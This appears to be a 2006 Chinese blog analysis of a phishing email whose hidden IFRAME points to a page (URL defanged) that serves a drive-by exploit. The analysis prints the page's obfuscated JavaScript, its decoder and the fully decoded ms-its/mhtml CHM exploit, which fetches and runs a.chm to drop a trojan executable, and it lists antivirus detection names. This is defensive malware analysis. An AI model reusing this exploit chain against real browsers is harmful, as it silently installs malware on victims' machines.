endurer原创
2006-04-04第1版
今天收到一封带毒邮件。这封带毒邮件与2005年末收到的带毒邮件(可参考:收到带病毒的电子邮件.... )相似,但有所翻新。
主题:最近好吗?怎么联系不上你
发件人: "zxc338855" zxc338855@163.com
邮件内容为:
老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了 老大最近怎么老是找不到你,你倒低跑那里去!打你电话也老是关机! 发短消息给你你也不回!发电子邮件估计你也没看!如果你看到这封信 打个电话给我!我有事找你!对了你QQ是不是换了啊!还是被人黑了!你原来那个QQ的人老是骂我!而且很恶心!我怀疑不是你!如过你QQ被黑了我这还有几个QQ可以送你!但是你要请客!不和你说了,有时间一定要和我联系!不要忘了
邮件体中用<IFRAME>引入了下载病毒的网页hxxp://2008.***e2.7868.net/service/bj/a.htm。
hxxp://2008.***e2.7868.net/service/bj/a.htm的内容为:
<SCRIPT LANGUAGE="JavaScript">
<!--
// Obfuscated payload: 16 chunks stored with every char code shifted up by one,
// plus two escape bytes (0x01 stands for '!', 0x02 means "next char is literal").
// psw() below reverses this; the decoded text is shown in plaintext further down
// the page.
var HtmlStrings=["=TDSJQU>wbs!Xpset>#&4Dcpez!podpoufyunfov&4E&33sfuvso!gbmtf&33!p","oesbhtubsu&4E&33sfuvso!gbmtf&33!potfmfdutubsu!&4E&33sfuvso!gb","mtf&33!potfmfdu&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!po","dpqz&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!pocfgpsfdpqz&","4E&33sfuvso!gbmtf&33!ponpvtfvq&4E&33epdvnfou&3Ftfmfdujpo&3Ffn","quz&39&3:&33&4F&4Doptdsjqu&4F&4Djgsbnf!tsd&4E&3B&4F&4D&3Gjgsb","nf&4F&4D&3Goptdsjqu&4F&1E&1B&4Dufyubsfb!je&4E&33dpef&33!tuzmf","&4E&33ejtqmbz&4Bopof&4C&33&4F&1E&1B&4Dpckfdu!ebub&4E&33&37&34","21:&4Ct&3Ejut&4Bniunm&4Bgjmf&4B&3G&3Gd&4B&6Dgpp&3Fniu&32&35&8","Cqbui&8E&3Gb&3Fdin&4B&4B&3Gb&3Fiun&33!uzqf&4E&33ufyu&3Gy&3Etd","sjqumfu&33&4F&1E&1B&4D&3Gpckfdu&4F&1E&1B&4D&3Gufyubsfb&4F&1E&","1B&4Dtdsjqu!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1Bepdvnfou&3Fxs","juf&39dpef&3Fwbmvf&3Fsfqmbdf&39&3G&6D&35&8Cqbui&8E&3Gh&3Dmpdb","ujpo&3Fisfg&3Ftvctusjoh&391&3Dmpdbujpo&3Fisfg&3FjoefyPg&39&38","b&3Fiun&38&3:&3:&3:&3:&4C&1E&1B&4D&3Gtdsjqu&4F&1E&1B#<epdvnfo","u/xsjuf)voftdbqf)Xpset**=0TDSJQU> "];
function psw(st){
  // Decoder for the page's custom encoding. Every stored character carries a
  // char code one higher than the real one; two escape bytes exist:
  //   0x01 -> the character '!'
  //   0x02 -> emit the following character unchanged (and skip over it)
  // Returns the decoded string; an empty input yields "".
  var out = "";
  var pos = 0;
  while (pos < st.length) {
    var code = st.charCodeAt(pos);
    if (code === 2) {
      pos += 1;
      out += String.fromCharCode(st.charCodeAt(pos));
    } else if (code === 1) {
      out += "!";
    } else {
      out += String.fromCharCode(code - 1);
    }
    pos += 1;
  }
  return out;
}
// Number of chunks to decode; matches the 16 elements of HtmlStrings above.
var num=16;
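function S(){
  // Decode each chunk of HtmlStrings with psw() and write it into the document.
  // The counter is declared with var: the original omitted the declaration,
  // which leaked `i` as an implicit global.
  for(var i=0;i<num;i++)
    document.write(psw(HtmlStrings[i]));
}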
// Entry point: the decoder runs as soon as the script is parsed.
S();
// -->
</SCRIPT>
网页使用了一个自定义的加密函数对代码进行加密。
解密后的代码为:
<!-- Second layer: the psw() output is itself URL-encoded and undone with
     unescape() before document.write(). Note the sequence %26%23109%3Bs%2Dits,
     i.e. "&#109;s-its": the first letter of the ms-its: scheme is written as an
     HTML entity, so the literal string "ms-its:" never appears in this text. -->
<SCRIPT>var Words="%3Cbody oncontextmenu%3D%22return false%22 ondragstart%3D%22return false%22 onselectstart %3D%22return false%22 onselect%3D%22document%2Eselection%2Eempty%28%29%22 oncopy%3D%22document%2Eselection%2Eempty%28%29%22 onbeforecopy%3D%22return false%22 onmouseup%3D%22document%2Eselection%2Eempty%28%29%22%3E%3Cnoscript%3E%3Ciframe src%3D%2A%3E%3C%2Fiframe%3E%3C%2Fnoscript%3E%0D%0A%3Ctextarea id%3D%22code%22 style%3D%22display%3Anone%3B%22%3E%0D%0A%3Cobject data%3D%22%26%23109%3Bs%2Dits%3Amhtml%3Afile%3A%2F%2Fc%3A%5Cfoo%2Emht%21%24%7Bpath%7D%2Fa%2Echm%3A%3A%2Fa%2Ehtm%22 type%3D%22text%2Fx%2Dscriptlet%22%3E%0D%0A%3C%2Fobject%3E%0D%0A%3C%2Ftextarea%3E%0D%0A%3Cscript language%3D%22javascript%22%3E%0D%0Adocument%2Ewrite%28code%2Evalue%2Ereplace%28%2F%5C%24%7Bpath%7D%2Fg%2Clocation%2Ehref%2Esubstring%280%2Clocation%2Ehref%2EindexOf%28%27a%2Ehtm%27%29%29%29%29%3B%0D%0A%3C%2Fscript%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
unescape后的代码为:
<!-- Final decoded markup. The body handlers either return false or clear the
     selection, which blocks the context menu, dragging, selecting and copying
     and so hinders casual inspection of the page in the browser. -->
<body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"><noscript><iframe src=*></iframe></noscript>
<!-- The <object> markup is parked in a hidden textarea rather than rendered
     directly; the script at the bottom reads it back through code.value.
     ${path} inside it is a placeholder filled in at runtime. -->
<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:\foo.mht!${path}/a.chm::/a.htm" type="text/x-scriptlet">
</object>
</textarea>
<script language="javascript">
// Replace every literal ${path} with location.href cut off before 'a.htm'
// (the URL the page was loaded from), then write the completed markup into
// the document.
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('a.htm'))));
</script>
该网页会下载、运行a.chm。
a.chm会释放/运行a.htm和a.exe,Kaspersky报为Exploit.HTML.CodeBaseExec和Trojan-Dropper.Win32.Pakes,瑞星报为Exploit.HTML.CodeExec和Trojan.PcGhost.c。